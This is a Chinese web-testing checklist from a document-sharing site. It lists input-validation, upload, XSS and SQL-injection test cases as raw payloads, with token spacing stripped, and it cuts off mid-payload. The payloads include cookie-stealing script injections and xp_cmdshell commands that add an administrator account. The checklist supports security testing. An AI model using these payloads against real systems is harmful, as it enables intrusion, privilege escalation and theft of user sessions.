




版權說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權,請進行舉報或認領
文檔簡介
常用安全性測試用例安全性測試:建立整體的威脅模型,測試溢出漏洞、信息泄漏、錯誤處理、SQL
注入、身份驗證和授權錯誤.1、輸入驗證客戶端驗證服務器端驗證(禁用腳本調(diào)試,禁用Cookies)1.輸入很大的數(shù)(如4,294,967,269),輸入很小的數(shù)(負數(shù))2.輸入超長字符,如對輸入文字長度有限制,則嘗試超過限制,剛好到達限制字數(shù)時有何反應3.輸入特殊字符,如:~!@#$%^&*()_+<>:”{}|4.輸入中英文空格,輸入字符串中間含空格,輸入首尾空格5.輸入特殊字符串NULL,null,0x0d0x0a6.輸入正常字符串7.輸入與要求不同類型的字符,如:要求輸入數(shù)字則檢查正值,負值,零值(正零,負零),小數(shù),字母,空值;要求輸入字母則檢查輸入數(shù)字8.輸入html和javascript代碼9.對于像回答數(shù)這樣需檢驗數(shù)字正確性的測試點,不僅對比其與問題最終頁的回答數(shù),還要對回答進行添加刪除等操作后查看變化例如:1.輸入<html”>”gfhd</html>,看是否出錯;2.輸入<inputtype=”text”name=”user”/>,看是否出現(xiàn)文本框;3.輸入<scripttype=”text/javascript”>alert(“提示”)</script>看是否出現(xiàn)提示。關于上傳:1.上傳文件是否有格式限制,是否可以上傳exe文件;2.上傳文件是否有大小限制,上傳太大的文件是否導致異常錯誤,上傳0K的文件是否會導致異常錯誤,上傳并不存在的文件是否會導致異常錯誤;[size=4"STYLE="background-image:url(javascript:alert('XSS'))"]一二三四五六七北京市[/size][color=Red"STYLE="background-image:url(javascript:alert('XSS'))"]一二三四五六七北京市[/color][align=center"STYLE="background-image:url(javascript:alert('XSS'))"]一二三四五六七北京市[/align][float=left"STYLE="background-image:url(javascript:alert('XSS'))"]一二三四五六七北京市[/float][font=微軟雅黑STYLE="background-image:url(javascript:alert('XSS'))"]一二三四五六七北京市[/font][size=4STYLE="background-image:url(javascript:alert('XSS'))"]一二三四五六七北京市[/size][color=RedSTYLE="background-image:url(javascript:alert('XSS'))"]一二三四五六七北京市[/color][align=centerSTYLE="background-image:url(javascript:alert('XSS'))"]一二三四五六七北京市[/align][list=1][*]一二三四五六七北京市[/list][indent]一二三四五六七北京市[/indent][float=leftSTYLE="background-image:url(javascript:alert('XSS'))"]一二三四五六七北京市[/float][media=ra,400,300,0]/posttopic.aspx?forumid=109[/media]輸出編碼常用的測試輸入語句有:<inputtype="text"/><input/><input/<script>alert('hello');</script>1.jpg"onmouseover="alert('xss')"></a><script>alert(‘xss’);</script>http://xxx';alert('xss');var/a='a‘”>xss&<a=”\”;b=”;alert(/xss/);//”<imgsrc=“輸出內(nèi)容”border=“0”alt=“l(fā)ogo”/>“’”‘”’“””““““”““‘”title=””對輸出數(shù)據(jù)到輸出數(shù)據(jù)的對比,看是否出現(xiàn)問題。防止SQL注入Admin--‘or--‘
and
(
)
exec
insert
*
%
chr
midand1=1;And1=1;aNd1=1;char(97)char(110)char(100)char(49)char(61)char(49)
;
%20AND%201=2‘a(chǎn)nd1=1
;
‘And
1=1
;
‘a(chǎn)Nd
1=1
;and1=2
;
‘a(chǎn)nd1=2and2=2anduser>0and(selectcount(*)fromsysobjects)>0and(selectcount(*)frommsysobjects)>0and(SelectCount(*)fromAdmin)>=0and(selecttop1len(username)fromAdmin)>0(username已知字段);execmaster..xp_cmdshell“netusernamepassword/add”—;execmaster..xp_cmdshell“netlocalgroupnameadministrators/add”—and0<>(selectcount(*)fromadmin)簡單的如wherextype=’U’,字符U對應的ASCII碼是85,所以可以用wherextype=char(85)代替;如果字符是中文的,比如wherename=’用戶’,可以用wherename=nchar(29992)+nchar(25143)代替。
跨站腳本攻擊(XSS)對于XSS,只需檢查HTML輸出并看看您輸入的內(nèi)容在什么地方。它在一個HREF標記中嗎?是否在IFRAME標記中?它在CLSID標記中嗎?在IMGSRC中嗎?某些Flash內(nèi)容的PARAMNAME是怎樣的?★~!@#$%^&*()_+<>,./?;'"[]{}\-★%3Cinput/%3E★%3Cscript%3Ealert('XSS')%3C/script%3E★<inputtype="text"/>★<input/>★<input/★<script>alert('xss')</script>★<script>alert('xss');</script>★</script><script>alert(‘xss’)</script>★javascript:alert(/xss/)★javascript:alert(/xss/)★<imgsrc="#"onerror=alert(/xss/)>★<imgsrc="#"style="Xss:expression(alert(/xss/));">★<imgsrc="#"/**/onerror=alert(/xss/)width=100>★=’><script>alert(document.cookie)</script>★1.jpg"onmouseover="alert('xss')★"></a><script>alert(‘xss’);</script>★http://xxx';alert('xss');var/a='a★’”>xss&<★"onmouseover=alert('hello');"★&{alert('hello');}★>"'><script>alert(‘XSS')</script>★>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>★>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>★AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22★%22%2Balert(%27XSS%27)%2B%22★<tablebackground="javascript:alert(([code])"></table>★<objecttype=text/htmldata="javascript:alert(([code]);"></object>★<bodyonload="javascript:alert(([code])"></body>★a?<script>alert(’Vulnerable’)</script>★<!--'">&:varfrom=‘$!rundata.Parameters.getString(’from’)';varfrom=”;hackerFunction(document.cookie);”;/publish/template/tem
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經(jīng)權益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
- 6. 下載文件中如有侵權或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 關于強買強賣合同范例
- 促銷活動合同范例
- 產(chǎn)品業(yè)務合作合同范例
- 借用人員合同范例
- 專項財務服務合同范例
- 樂器租用合同范例
- 出租房設備安裝合同范例
- 住宅樓工程安裝合同范例
- it開發(fā)合同范例
- 內(nèi)部選拔聘用合同范例
- 2024年08月澳門2024年中國銀行澳門分行校園招考筆試歷年參考題庫附帶答案詳解
- 110KV-GIS設備技術要求
- 《從外觀看豬病診治》課件
- 2024年度城市規(guī)劃與交通設計院深度合作框架協(xié)議3篇
- 李四光《看看我們的地球》原文閱讀
- GA/T 1740.2-2024旅游景區(qū)安全防范要求第2部分:湖泊型
- 2025屆高考數(shù)學專項復習:阿基米德三角形【六大題型】含答案
- 華東師范大學《政治學概論》2023-2024學年第一學期期末試卷
- 2024年中考模擬試卷歷史(甘肅蘭州卷)
- 醫(yī)療器械EHS培訓
評論
0/150
提交評論